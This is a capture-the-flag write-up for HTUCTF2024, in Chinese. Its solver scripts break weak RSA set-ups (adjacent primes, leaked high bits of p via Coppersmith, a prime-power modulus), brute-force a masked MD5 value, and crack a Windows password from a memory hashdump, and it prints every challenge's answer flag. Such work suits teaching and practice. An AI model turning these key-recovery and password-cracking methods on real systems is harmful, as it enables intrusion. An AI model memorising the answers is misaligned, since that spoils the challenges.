
HTUCTF2024 河南师范大学招新赛

CRYPTO

easyMath

题目

中国古代有很多人同名
譬如同样叫孙子,有的人会兵法,有的人会数学
你能帮我求解出这道题的答案吗?
请开启容器后下载对应输出文件
难度:简单

from secret import flag
from Crypto.Util.number import *


def s2n(string):
	"""Encode text as UTF-8 and read the resulting bytes as one big-endian integer."""
	hex_digits = string.encode("utf-8").hex()
	return int(hex_digits, 16)


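# The flag as a single integer. NOTE(review): the flag printed in the write-up
# is 44 bytes long, so m is expected to be larger than either 256-bit modulus.
m = s2n(flag)

# Two independently generated 256-bit primes act as the moduli.
n1 = getPrime(256)
n2 = getPrime(256)

# Only the residues are published. Two distinct primes are coprime, so the
# Chinese Remainder Theorem fixes m modulo n1*n2, and that value is m itself
# whenever m < n1*n2. Reducing a secret modulo public numbers hides nothing
# once the product of the moduli exceeds the secret.
c1 = m % n1
c2 = m % n2

# The with-block closes the file on exit, so no explicit close() is needed.
with open("./result.txt","w") as file:
	file.write(f"{c1=}\n{c2=}\n{n1=}\n{n2=}")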


c1=83689382223866455921972283666041548913707590157650641569649861997774896018775
c2=59781417889496026093316789713307179877847969875945980953377618064246216393966
n1=94819471330207996193824867701549517420931391131653697367385442658040198169087
n2=81518723062141584749826931381471762289036698180799665826428079725669435831939

我的解答:

给了两组n,c,两两互素,中国剩余定理模板直接打

import gmpy2
import libnum
c1=83689382223866455921972283666041548913707590157650641569649861997774896018775
c2=59781417889496026093316789713307179877847969875945980953377618064246216393966
n1=94819471330207996193824867701549517420931391131653697367385442658040198169087
n2=81518723062141584749826931381471762289036698180799665826428079725669435831939
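# Chinese Remainder Theorem: rebuild m from its residues c[i] modulo n[i].
# The template's `e = 1` / `iroot(m_e, 1)` step was a no-op here (it belongs to
# the broadcast-attack variant of this script) and has been dropped.
n = [n1, n2]
c = [c1, c2]

# CRT requires pairwise-coprime moduli; state that assumption explicitly
# instead of relying on gmpy2.invert to fail further down.
assert gmpy2.gcd(n1, n2) == 1, "moduli are not coprime"

N = 1
for modulus in n:
    N = N * modulus

m = 0
for residue, modulus in zip(c, n):
    cofactor = N // modulus  # product of all the other moduli
    m = m + residue * cofactor * gmpy2.invert(cofactor, modulus)
m = int(m % N)

# The result is m modulo N only; it equals the original message when that
# message was smaller than N. Check that it reproduces every residue.
assert all(m % modulus == residue for residue, modulus in zip(c, n))

flag = libnum.n2s(m)
print(flag)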
# HTUCTF{6830dfb6-6dad-47c3-9845-cbf8729a39d0}

babyRSA

题目

只有做出了这道题,你才算真正迈入了密码学的世界
RSA的用途非常广泛,从SSH到网页交互,处处存在着RSA的身影
他是一种非对称加密方式,有两把钥匙,我们用一把钥匙进行加密,对方只能用另一把钥匙进行解密
我们管这两把钥匙叫做公钥和私钥
不知你有没有好奇过,这么神奇的算法究竟是怎么做到的?
在这道题中,我将给你公钥和私钥,你能够把加密的信息解出来吗?
题目难度:简单

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	"""Return the UTF-8 bytes of `string` interpreted as a big-endian integer."""
	encoded = string.encode("utf-8")
	return int(encoded.hex(), 16)


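m = s2n(flag)

# Textbook RSA with two random 1024-bit primes and e = 65537.
p = getPrime(1024)
q = getPrime(1024)
n = p*q
e = 0x10001
phi = (p-1)*(q-1)
# gmpy2.invert raises ZeroDivisionError when e shares a factor with phi;
# this script does not retry in that case.
d = int(invert(e,phi))

# No padding is applied: the ciphertext is m^e mod n.
c = pow(m,e,n)

# The private exponent d is written next to the public key on purpose (that is
# the exercise). Anyone holding this file can decrypt the message.
# The with-block closes the file on exit, so no explicit close() is needed.
with open("./babyRSA.txt","w") as file:
	file.write(f"PublicKey = {(n,e)}\nPrivateKey = {(n,d)}\nSecretMessage = {c}")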
PublicKey = (15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659, 65537)
PrivateKey = (15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659, 10130966979812730784101987023698572165438594877129919513875915803386628078276096541375947471124972080653508946533508705769675989693121420958341293590115967743877780573199816212130999984155050824612355332287183770309757244122492983619964767386402633068863887043854103203055675295220493184082954328413364468756304963614016917597743916465686317910038955387483525262605921266852350229828235038160818884177156053818135328631651154292654654240777442377441948318512112581410714535003804163937871843629160969182930526468352966433926341943406916675978477553950863356810621030844225209745966135746365112354585567779963748595969)
SecretMessage = 8909815489319611747101806090352005136825996914855161761302645282643080552432976736620209215329466289301992429134065407495314041984721445376467363401021503220512909366842774353910947660541614402215323602839266991486292484969950842395065745792919439549479729664538304190570526236917426962327919265077666475322894816082657333664773384861021347407612617932770946226057878531069668485974874093332911603383506567742453209014787426744169318763457638545787910612700001393603668998957766517443362067847142093494532359202010509321223568196703549094729917579540223646141085303490009162322771331375674034776269587055027505487338

我的解答:

给了n,e,d,c直接打

from Crypto.Util.number import *
n=15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659
e=65537
c=8909815489319611747101806090352005136825996914855161761302645282643080552432976736620209215329466289301992429134065407495314041984721445376467363401021503220512909366842774353910947660541614402215323602839266991486292484969950842395065745792919439549479729664538304190570526236917426962327919265077666475322894816082657333664773384861021347407612617932770946226057878531069668485974874093332911603383506567742453209014787426744169318763457638545787910612700001393603668998957766517443362067847142093494532359202010509321223568196703549094729917579540223646141085303490009162322771331375674034776269587055027505487338
d=10130966979812730784101987023698572165438594877129919513875915803386628078276096541375947471124972080653508946533508705769675989693121420958341293590115967743877780573199816212130999984155050824612355332287183770309757244122492983619964767386402633068863887043854103203055675295220493184082954328413364468756304963614016917597743916465686317910038955387483525262605921266852350229828235038160818884177156053818135328631651154292654654240777442377441948318512112581410714535003804163937871843629160969182930526468352966433926341943406916675978477553950863356810621030844225209745966135746365112354585567779963748595969

# n and d are both given, so decryption is the plain RSA operation c^d mod n.
plaintext_int = pow(c, d, n)
print(long_to_bytes(plaintext_int))
# HTUCTF{ebc4a957-ab76-481c-b6bd-667cc4ac3753}

RSA

题目

干的漂亮!你现在一定掌握了一定的RSA相关知识了,你现在可能觉得RSA是如此的完美
是的,在理想情况下,2048位的RSA甚至可以用来为银行提供安全保障
但是万事皆有例外,在某些情况下,RSA也会变的不那么安全
那么,本题就模拟了这样一种不太安全的RSA,他允许你通过公钥去计算得到私钥
在本题中,你需要通过你高中所学的知识与素数相关知识去找到漏洞所在
并计算出私钥来解开关键数据!
题目难度:中等

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	"""Turn text into an integer by hex-reading its UTF-8 encoding."""
	as_hex = string.encode("utf-8").hex()
	return int(as_hex, 16)


m = s2n(flag)

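def gen():
	"""Generate the (deliberately weak) RSA parameters for this challenge.

	Returns:
		(n, e, phi) as plain Python ints.

	q is always the prime immediately following p, so both factors lie right
	next to sqrt(n). That closeness is the intended weakness: it lets n be
	factored from the public key alone.

	The original retry branch assigned q = next_prime(p) without int(), so
	after a retry n and phi were gmpy2 mpz values and f"{n=}" would have
	written "n=mpz(...)" to the output file. Every attempt now converts q.
	"""
	e=0x10001
	while True:
		p = getPrime(1024)
		q = int(next_prime(p))
		n = p*q
		phi = (p-1)*(q-1)
		# e must be invertible modulo phi; otherwise draw a new pair.
		if gcd(phi,e) == 1:
			return (n,e,phi)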


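n,e,phi = gen()
# Textbook RSA, no padding: c = m^e mod n.
c = pow(m,e,n)

# Only n and c are published; phi stays local.
# The with-block closes the file on exit, so no explicit close() is needed.
with open("./RSA.txt","w") as file:
	file.write(f"{n=}\n{c=}")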

n=21286146193854256777821383042439507781105332290319538512628531084363651251523737327523526945612481957021838676502097885784407117228821536316627194056016486984426091341625957366569549571084440241355428867857837140319691847950217286102843758914496900637376261209537885852057822619662489521115321859242996996458728300402824811649138687472097270381948645979317238405355317018553106347027764063263805658928486133580606644257911929016951909686457495514815344574782826352986788656399212873924655579987522938396847374837850343107582172369858866834252004753149808298622166784424349528065903222286329891172505299710375017996191
c=7921489143329983775649495695329191444017407997719201400647964433213317629336909589895994155506980858710603819714367102048723400232379433082760979014532262440915742640192044614047545849862082848156805064088229776304993545321080324512923192149436096920526568355327960180036643391499502690341050835062928627571479179709775940839058598193047520944765623044970104274162972438155291820907007955749419361799197271532772738133005238318979095274472556402534604449320547273946695463016399927750930765171319755043575142378579721541211811566320576805327333527544884573840360315620734184329550640235605842721184595864846192049833

我的解答:

临近素数,板子打

from Crypto.Util.number import *
from gmpy2 import *
e = 65537
n=21286146193854256777821383042439507781105332290319538512628531084363651251523737327523526945612481957021838676502097885784407117228821536316627194056016486984426091341625957366569549571084440241355428867857837140319691847950217286102843758914496900637376261209537885852057822619662489521115321859242996996458728300402824811649138687472097270381948645979317238405355317018553106347027764063263805658928486133580606644257911929016951909686457495514815344574782826352986788656399212873924655579987522938396847374837850343107582172369858866834252004753149808298622166784424349528065903222286329891172505299710375017996191
c=7921489143329983775649495695329191444017407997719201400647964433213317629336909589895994155506980858710603819714367102048723400232379433082760979014532262440915742640192044614047545849862082848156805064088229776304993545321080324512923192149436096920526568355327960180036643391499502690341050835062928627571479179709775940839058598193047520944765623044970104274162972438155291820907007955749419361799197271532772738133005238318979095274472556402534604449320547273946695463016399927750930765171319755043575142378579721541211811566320576805327333527544884573840360315620734184329550640235605842721184595864846192049833

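# The challenge's gen() picks q as the prime right after p, so p < sqrt(n) < q
# and the first prime above floor(sqrt(n)) is q.
# The gmpy2 functions are called through the names that `from gmpy2 import *`
# binds: this script never runs `import gmpy2`, so the `gmpy2.` prefix is not
# guaranteed to resolve.
sn = isqrt(n)
q = next_prime(sn)
p, remainder = divmod(n, q)
# Fail loudly if the adjacency assumption does not hold for this n.
assert remainder == 0, "n is not divisible by next_prime(isqrt(n))"
phi = (p-1)*(q-1)
d = invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))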
# HTUCTF{0bc91ba1-7847-424f-a5ae-7514c2dae479}

密码_签到

题目

你知道凯撒加密吗?

FRSARD{UCJAMKC_RM_2024_FRSARD!!!}

我的解答:

随波逐流梭

HTUCTF{WELCOME_TO_2024_HTUCTF!!!}

high_RSA

题目

恭喜你,你已经了解了RSA在可能的情况下的危害
但是,正如麻绳专挑细处断一样,安全的方方面面都不可或缺
让我们假设你是一名红客,手里拥有一个对方电脑的后门程序,但是这个程序为了不被发现无法申请足够内存
为了获取对方的数据,你利用这个程序获得了对方电脑RSA的数据,以便通过SSH连接到对方电脑
这个数据量过于庞大,以至于你只能获取到一部分数据
你能够恢复出来完整的数据来成功骇入吗?
题目难度:难
(其实也没多难...不要被抽象代数吓到了,我不会数学≠我不会解题,不等式秒了)

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	"""Map text to the integer whose big-endian bytes are its UTF-8 encoding."""
	utf8_hex = string.encode("utf-8").hex()
	return int(utf8_hex, 16)


m = s2n(flag)

def gen():
	"""Generate RSA parameters from two independent 1024-bit strong primes.

	Prime pairs are drawn until e = 65537 is invertible modulo phi.

	Returns:
		(n, e, phi, p, q)
	"""
	e=0x10001
	while True:
		p = getStrongPrime(1024)
		q = getStrongPrime(1024)
		n = p*q
		phi = (p-1)*(q-1)
		if gcd(phi,e) == 1:
			break
	return (n,e,phi,p,q)


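n,e,phi,p,q = gen()
# Textbook RSA, no padding: c = m^e mod n.
c = pow(m,e,n)
# Clear the low 256 bits of p. The published value therefore leaks the upper
# 768 bits of the 1024-bit prime, which is the weakness this challenge is
# built around: partial disclosure of a factor can be enough to recover it.
high_p = (p >> 256) << 256

# The with-block closes the file on exit, so no explicit close() is needed.
with open("./highRSA.txt","w") as file:
	file.write(f"{n=}\n{c=}\n{high_p=}")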
n=26832066962458662767711134650569516764878390244093044249431717541352809829010026292756085075249493683546901865571162092807642447066717935954820980203362970326424457510243979090947839410021515024546564848003707416178430454370843256632438176839918149251551762655339805650499916986912193271524738666644992154557709230313336222352760741284949409799415476076495429070382400856900167330412449787134931316411702443532096911949687029419857447352146932683073974227601854627297878898195567899861786632327700242864905513181808927779278798543351526860932005535628493103381412084360219740343872835463714854550964908803100739720711
c=5263373082734577567839479586655414623605123502659516848748731798811781440341949806983283726466045084344593071073334658221121562912558383981187865516410285252387584393467585522751249550213224687813899297082806077871733395201872158325739707521228687723161973373291027234390564962358683344756569018948507404252733763898300987607979776946680568688214863909198222484739353033110947869228017720295399019491952331445167542451969127203340175478249933145970770930874714514592875202353852229150430254860073007705757537682021345088127046213891504810736043999063285587400229349628962118127506856508919505894615638568778221088766
high_p=155260268569003012839830552245401347442679649702540687666718397914567736179525136763425429591738078795659488517073327110371579992023376288690407974823049327122522731236534457700781670557633182106779419333443659720534567359356182612444617411150434138985917242359563702694312595606207476750599129603389758898176

我的解答:

经典的p高位泄露

import gmpy2
from Crypto.Util.number import *
e=65537
n=26832066962458662767711134650569516764878390244093044249431717541352809829010026292756085075249493683546901865571162092807642447066717935954820980203362970326424457510243979090947839410021515024546564848003707416178430454370843256632438176839918149251551762655339805650499916986912193271524738666644992154557709230313336222352760741284949409799415476076495429070382400856900167330412449787134931316411702443532096911949687029419857447352146932683073974227601854627297878898195567899861786632327700242864905513181808927779278798543351526860932005535628493103381412084360219740343872835463714854550964908803100739720711
c=5263373082734577567839479586655414623605123502659516848748731798811781440341949806983283726466045084344593071073334658221121562912558383981187865516410285252387584393467585522751249550213224687813899297082806077871733395201872158325739707521228687723161973373291027234390564962358683344756569018948507404252733763898300987607979776946680568688214863909198222484739353033110947869228017720295399019491952331445167542451969127203340175478249933145970770930874714514592875202353852229150430254860073007705757537682021345088127046213891504810736043999063285587400229349628962118127506856508919505894615638568778221088766
high_p=155260268569003012839830552245401347442679649702540687666718397914567736179525136763425429591738078795659488517073327110371579992023376288690407974823049327122522731236534457700781670557633182106779419333443659720534567359356182612444617411150434138985917242359563702694312595606207476750599129603389758898176
# This part is Sage, not plain Python: `R.<x>` and `^` as exponentiation rely
# on the Sage preparser.
# Polynomials in x over the integers modulo n.
R.<x> = PolynomialRing(Zmod(n))
# p = high_p + x for an unknown x. The challenge cleared the low 256 bits of p,
# so 0 <= x < 2^256.
f = high_p + x
# Coppersmith's method: search for a root below X modulo a divisor of n that is
# at least n^beta. Both primes are 1024 bits, so p is about n^0.5 and
# beta = 0.4 is a valid lower bound.
x = f.small_roots(X = 2^256,beta = 0.4)
# small_roots returns a list; when it is empty the script prints nothing.
if x:
    p = high_p + int(x[0])
    # NOTE(review): n % p == 0 is not checked before p is used as a factor.
    q = n // p
    d = gmpy2.invert(e,(p-1)*(q-1))
    m = pow(c,d,n)
    print(long_to_bytes(int(m)))
# HTUCTF{bbb7e2c4-5739-4eab-ad45-570c86be20e7}

Attack

题目

对于一种密码体系,如果我们能够找到一种方法,使得通过已知的部分内容和对应的被加密的内容,来破解出对应的秘钥
那么这种方法就被叫做明文攻击
那么在本题中,将会给你一种被类似于凯撒密码的密码体系加密后的值
你能够对他进行攻击并找出flag吗?
题目难度:简单

本题flag头为htuctf{}

secret is :oxfnhm{51fn0n78-78r2-49k2-e6o6-45386qth8i2q}

我的解答:

维吉尼亚解码,key是hello(根据flag头算出来的:已知明文htuctf对应密文oxfnhm,逐位相减得到密钥流hello,第六位又回到h,说明密钥是循环使用的hello)

奇怪的RSA

题目

这个n怎么跟之前学的不一样了
难度:中等偏下

n=9797280722297383274206129366924911238159531646782588235425496441018603521906214822246463461173026436766357301667490255758014545136376215630632913217943693454599607181104457459704890073820815269629927086893622983109900322077682061770037009627858293858079170648986304796239176995439230791482842207808760812707274441718245663482728958202732073615184138431872947691082675226097330289348107538915563758447312783574426116626142170193857288512932028427662766889672667666124977746543158461842707085268112769440167135292097914024183004899521423565999413912896081894668524836680741305072184620592976414632021146993068852321682224774063402386979275754410550658725965565558741379647004611814084223568478000636303177114721095055926493733229126101656421088488149818472808276183648127582974030582322605326949335921761883338261371947420333298835965419945468897218378857695789805996307849895056019137558524547291427992927750239912783691973289027652868009039409101567361743084903654992780865430272335247215413205988182536939011777593246190904789384746466169417549523741915876204210448126866806898004736948795818397941220900188611543001463316268786023800879826714282193478815064580026612881606703097040735229393269388992971022987866655043694603025183226901723140756053762333659842691711475526354396212072576764822816149219166129647066887324015483710351976091899190818277553825384103028795714466631003515086950798032880614154340697278735600240355126104124454472587233763326168718337010496877414696789855658240440976001073107676481646007868257165514512406462907
c=5026294270472341516281967768024823988211520479705550347791737269197144991018432260772869917413931970596323376462942676330952706594203686062230870565305755713397064980008245765280923086185322432350745365676393859410733791638737980029398313605454331200823466184561513332154358260911960012186030476084183825686415220565409492864776416837513373738512522098564292785408992952241100323270440158180673533227197308932835014106694454970006386898536636626965401897549172858412952232900506615210718784844859331905728127508619293848356738221599940095985149564780003406814853991525248042768596039920545745290215481665663646075842598915149383754511745185069733195598186369553443089170842916619037179927876137170091853123369124452414031777068336531175674802393050859481751905561595637672065609328749148665586779113822274605772746671318603508401332234892783270849494429661389179557105978067614723323979133624001944328078576201959628636669711294925830023172880802286460253693491031523534646275507929337557144216000320046044856456105803221553459208055536477727124999642450266747885923500686074656279403605048320346579292324096695911518310045059703013950287439053123110957256092192591738831212887488314280535596199050937975272001815140057838227666534017906857787101647310250002243565024224470944832652926327140423057025650796529363452647655178633472248390631519187741674904685731259241960485176749338780224419187384859336116383909982282465893681707228873285368252148860007084379792234483840610940427165345252500655046498669531835852991292614317980670782795421
e=65537

我的解答:

分解n发现是p的五次方,这种情况下的phi=p**5 - p**4

exp:

import gmpy2
from Crypto.Util.number import *

n=9797280722297383274206129366924911238159531646782588235425496441018603521906214822246463461173026436766357301667490255758014545136376215630632913217943693454599607181104457459704890073820815269629927086893622983109900322077682061770037009627858293858079170648986304796239176995439230791482842207808760812707274441718245663482728958202732073615184138431872947691082675226097330289348107538915563758447312783574426116626142170193857288512932028427662766889672667666124977746543158461842707085268112769440167135292097914024183004899521423565999413912896081894668524836680741305072184620592976414632021146993068852321682224774063402386979275754410550658725965565558741379647004611814084223568478000636303177114721095055926493733229126101656421088488149818472808276183648127582974030582322605326949335921761883338261371947420333298835965419945468897218378857695789805996307849895056019137558524547291427992927750239912783691973289027652868009039409101567361743084903654992780865430272335247215413205988182536939011777593246190904789384746466169417549523741915876204210448126866806898004736948795818397941220900188611543001463316268786023800879826714282193478815064580026612881606703097040735229393269388992971022987866655043694603025183226901723140756053762333659842691711475526354396212072576764822816149219166129647066887324015483710351976091899190818277553825384103028795714466631003515086950798032880614154340697278735600240355126104124454472587233763326168718337010496877414696789855658240440976001073107676481646007868257165514512406462907
c=5026294270472341516281967768024823988211520479705550347791737269197144991018432260772869917413931970596323376462942676330952706594203686062230870565305755713397064980008245765280923086185322432350745365676393859410733791638737980029398313605454331200823466184561513332154358260911960012186030476084183825686415220565409492864776416837513373738512522098564292785408992952241100323270440158180673533227197308932835014106694454970006386898536636626965401897549172858412952232900506615210718784844859331905728127508619293848356738221599940095985149564780003406814853991525248042768596039920545745290215481665663646075842598915149383754511745185069733195598186369553443089170842916619037179927876137170091853123369124452414031777068336531175674802393050859481751905561595637672065609328749148665586779113822274605772746671318603508401332234892783270849494429661389179557105978067614723323979133624001944328078576201959628636669711294925830023172880802286460253693491031523534646275507929337557144216000320046044856456105803221553459208055536477727124999642450266747885923500686074656279403605048320346579292324096695911518310045059703013950287439053123110957256092192591738831212887488314280535596199050937975272001815140057838227666534017906857787101647310250002243565024224470944832652926327140423057025650796529363452647655178633472248390631519187741674904685731259241960485176749338780224419187384859336116383909982282465893681707228873285368252148860007084379792234483840610940427165345252500655046498669531835852991292614317980670782795421
e=65537
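# n is a perfect fifth power p^5. iroot returns (root, is_exact); check the flag
# instead of silently using a truncated root.
p, exact = gmpy2.iroot(n, 5)
if not exact:
    raise SystemExit("n is not a perfect fifth power")
# For a prime power, phi(p^5) = p^5 - p^4 = p^4 * (p - 1), not (p - 1)^5.
phi = p**5 - p**4
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))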
# HTUCTF{7b2ca463-d2d9-47ac-930b-6914c3d00c8a}

baby_equation

题目

描述:简单的方程组
题目难度:中等

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

filename = "baby_equation.txt"

def s2n(string):
	"""Interpret the UTF-8 encoding of `string` as one big-endian integer."""
	digits = string.encode("utf-8").hex()
	return int(digits, 16)


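m = s2n(flag)

e = 65537
# Three primes of different sizes; n is their product.
p = getPrime(256)
q = getPrime(158)
r = getPrime(126)
n = p*q*r
# Two polynomial relations between the secret primes are published as hints.
# Together with n = p*q*r they give three equations in three unknowns, so the
# hints are enough to recover the factorisation.
hint1 = p**2-q**3+r**5
hint2 = p-q**2-r**3
# Textbook RSA, no padding.
c = pow(m,e,n)
print(f'n = {n}')
print(f'c = {c}')
print(f'hint1 = {hint1}')
print(f'hint2 = {hint2}')

# The with-block closes the file on exit, so no explicit close() is needed.
with open(f"./{filename}","w") as file:
	file.write(f"{n=}\n{c=}\n{hint1=}\n{hint2=}")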

我的解答:

方程组,三个未知数,三个等式

直接解

import gmpy2
import sympy as sp
from Crypto.Util.number import long_to_bytes

# Symbolic unknowns for the three prime factors p, q and r.
p, q, r = sp.symbols('p q r')

# 定义方程组
n=1714808108641798425751310477167823335955229712489728804761312762037242675123506918099136836072952998053478120207249337855548456594600603091879518033495336649464097
c=1271059887748896825060264613725111099333346917676850000927141530723445751426003464525479424933165773851501797216393819428216922457947718026431628278372802650997905
hint1=873322371665117750002905530165951105343454768307957282438202226511477054275833928519265678069449383868985966127316349093439543595940439424293980757113264748232611064850437734072475831795015
hint2=-231581973880579877071715841045171446682851086334176281592273453765336628759594866687658829710062474739604131003041
# Each expression is "left side minus right side" of one relation from the
# challenge; sympy treats a bare expression as "expression = 0".
eq1 = p**2-q**3+r**5-hint1
eq2 = p-q**2-r**3-hint2
eq3 = p*q*r-n
# Solve the system for (p, q, r).
# NOTE(review): the symbols carry no integer/positive assumptions, so the
# result may hold more than one solution; the values used below were
# presumably picked from this output by hand.
sol = sp.solve((eq1, eq2, eq3), (p, q, r))
print(sol)
# p = 92915895594985626121143662996242137124019722863293916576352995643967780302439
# q = 300531911762485106017266076248013109964445189793
# r = 61409408903806830899572429924195985111

# 解题
n=1714808108641798425751310477167823335955229712489728804761312762037242675123506918099136836072952998053478120207249337855548456594600603091879518033495336649464097
c=1271059887748896825060264613725111099333346917676850000927141530723445751426003464525479424933165773851501797216393819428216922457947718026431628278372802650997905
e = 65537
p = 92915895594985626121143662996242137124019722863293916576352995643967780302439
q = 300531911762485106017266076248013109964445189793
r = 61409408903806830899572429924195985111
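# p, q and r were pasted in from the solver output; confirm they really
# factor n before deriving a key from them.
assert p * q * r == n, "p*q*r does not reproduce n"
# n is a product of three distinct primes, so phi(n) = (p-1)(q-1)(r-1).
d = gmpy2.invert(e, (p - 1) * (q - 1) * (r - 1))
m = pow(c, d, n)
print(long_to_bytes(int(m)))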
# HTUCTF{a29fa9c1-ac6b-4381-b173-002549e01c06}

guoql的大冒险

题目

guoql喜欢小兔子,有一天他家养的小兔子被坏人用3层栅栏困住了,聪明的你能帮助guoql解决困难把兔兔释放出来吗?

UdX6OtWqCp0KRHsA
z2sGk1DifJ3aqdNZzk4j7Sk73dTpwTI1BkfFV/KaLWB5bTcODXvH

我的解答:

先栅栏解码再兔子流解码

 

MISC

彩蛋

题目

在这个比赛平台中有一些菜单,你能找到他并恢复出来flag吗?

不需要对网站进行爆破扫描!

我的解答:

观察平台会发现如下信息:

我想你需要知道:4854554354467b77656c63306d655f325f485455

141,156,144,137,150,141,166,145,137,146,165,156,175

还有一张图片(试过就知道这张图其实没有用)

第一部分:16进制转字符: HTUCTF{welc0me_2_HTU

第二部分:八进制转字符: and_have_fun}

拼接:HTUCTF{welc0me_2_HTUand_have_fun}

初中数学(计算机版)

题目

弄脏的数字
就如同小明小时候喜欢将墨水泼到纸张上一样,学了计算机的小明还是没有改掉这个坏习惯
这下,他又通过奇怪的方式“一不小心”把部分数字给弄脏了(题目中用?表示)
还好老师保存了md5值
你能帮他恢复数据吗?
题目难度:简单

这是他弄脏的flag
HTUCTF{372?7539-0217-1?ef-a234-f8?9d27fc?22}

md5=b9636e79bccbe1cbcdb2f9a7f698742d

我的解答:

典型的MD5爆破

import string
import hashlib
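from itertools import product

# Candidate characters for each of the four masked positions.
# NOTE(review): the masked positions sit inside a UUID-like string, so hex
# digits alone would probably be enough; the full alphanumeric set is kept
# because the challenge does not say so.
dic1=string.digits+string.ascii_lowercase+string.ascii_uppercase
# MD5 of the complete flag, as given by the challenge.
target = 'b9636e79bccbe1cbcdb2f9a7f698742d'

# Four unknown characters out of 62 is under 15 million candidates. A fast
# unsalted hash published next to a mostly known value does not protect the
# missing part.
# product() visits the candidates in the same order as four nested loops.
for i1, i2, i3, i4 in product(dic1, repeat=4):
	t='HTUCTF{372'+i1+'7539-0217-1'+i2+'ef-a234-f8'+i3+'9d27fc'+i4+'22}'
	# hexdigest() is exactly 32 characters, so compare the whole digest
	# (the former [:38] slice never shortened it).
	if hashlib.md5(t.encode('utf-8')).hexdigest() == target:
		print (t)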
# HTUCTF{37277539-0217-11ef-a234-f889d27fcc22}

ez取证

题目

小m在他的电脑里面存放了一个机密文件,你能找到这个文件吗?
https://www.123pan.com/s/VXmfjv-bPv4H.html
提取码:A5T4
题目难度:中等

我的解答:

R-Studio扫描镜像文件发现压缩包:flag.txt.zip

还原出来即可。解压发现需要密码。

volatility进行hashdump爆破即可

得到哈希值 15f952a687d575198c3c5dbd9a1aa89c 后 somd5解码即可得到密码:Windows.7

htuCTF{Th1s_1s_e2sy_f0rens1cs!!!}

a1eiqinuo

题目

检验原批浓度的时候到了!
ps:得到的flag请套上htuCTF{}提交

我的解答:

解压得到图片

010文件尾发现 c3RlZ2hpZGVfcGFzcz1odHVDVEY=

base64解码:steghide_pass=htuCTF

可知steghide隐写,尝试原图无果。发现里面藏的压缩包里面还有图片。。。。

卡里分离得到压缩包,纯数字八位爆破得到密码 20240424

这个应该才是steghide隐写,然后可以得到wenzi.jpg

一眼丁真 原神字体,对着下面的表找即可。。

htuCTF{yuanshenqidong}

music

题目

好听的音乐中暗藏玄机。
得到的flag请修改为HTUCTF{}
题目难度:简单

尝试查看属性,里面可能有提示

我的解答:

属性里面发现MP3Stego 还有一个发布者:111

指令:decode -X -P 111 music.mp3

直接得到:flag{valorant_is_a_good_game}

提交时改下flag头即可

baseHome-misc签到

题目

base家族的加密你知道几个?
难度:签到

SkJLRktRMlVJWjVXRVlMVE1VM0RJWDNCTlpTRjZZVEJPTlNUR01TN05GWlY2NVRGT0o0VjYyREJPQllIUzdJPQ==

我的解答:

echo

题目

感觉不如初音未来

我的解答:

echo.mid音频文件,找个在线工具打开即可 https://app.ampedstudio.com/

然后注册一个账号就能用了。

然后导入MIDI文件,如下:发现最下层的轨道给了hint,仔细观察像是电位高低,高位1,低位0,转一下01即可。

0110100001110100011101010110001101110100011001100111101101100111011101010110110100110001010111110011000101110011010111110011011001101111001101000010000101111101

解码得到:htuctf{gum1_1s_6o4!}

简单流量分析

题目

小明上传了一张图片,这是他产生的流量发生的变化。
题目难度:简单

我的解答:

根据题目描述,Wireshark流量分析HTTP流发现两个图片,分别是jpg和gif(直接搜索GIF89a)

里面还有个hacker.png但没什么用。还是要从jpg和gif入手的。

导出HTTP全部文件即可。找最大的那个php文件,然后赛博厨子打开文件。

我们把GIF89a前面那段jpg信息删掉就行,然后保存文件为gif即可。分离每一帧。

发现有些地方有&#xx;类的编码。提取全部:&#102;&#108;&#97;&#103;&#123;&#83;&#48;&#50;&#50;&#121;&#52;&#111;&#114;&#114;&#53;&#125;

HTML解码得到:flag{S022y4orr5}

机位查询

题目

小l和小s去年去了很多地方,拍了很多照片,你能找到这几张图片是在哪里拍的吗?
ps:这三张图片的拍摄位置都是标志性地点,在地图上均可查。flag为1,2,3张图片拍摄点的每个字的第一个字母大写,三个拍摄点之间用_隔开
如:若找到的拍摄地点分别为"洛邑古城""二七广场""数字大厦",则flag为htuCTF{LYGC_EQGC_SZDS}
题目难度:简单

我的解答:

三幅图:

第一处:

百度地图找龙门石窟。定位到河对面,然后观察此图有楼梯有佛像。按方位来看是偏左一点。可发现是(礼佛台)百度一下这个地方简介会出现全名:礼佛观景台。此处也是拍照的好方位。

第二处:

百度识图发现是泰山。问了熟悉泰山的本地朋友知道是十八盘(很出名)。然后对着百度十八盘复现了一下地点 确信!

第三处:

后面是标志性建筑郑州玉米楼,谷歌查一下就行了,找下方位。不过我还问了郑州的朋友确认了一下(比较熟悉附近的,丹尼斯那一片区域)直接就看出来是烟草大厦了。

htuCTF{LFGJT_SBP_YCDS}

你好

题目

他说本来想给你点提示的,但是奈何嘤语不好
于是好心的guoql帮忙翻译成中文了!(掐腰.jpg)
你能知道他想提示你什么,并获取flag吗?
题目难度:简单

我的解答:

png宽高一把梭发现密码:maoxian

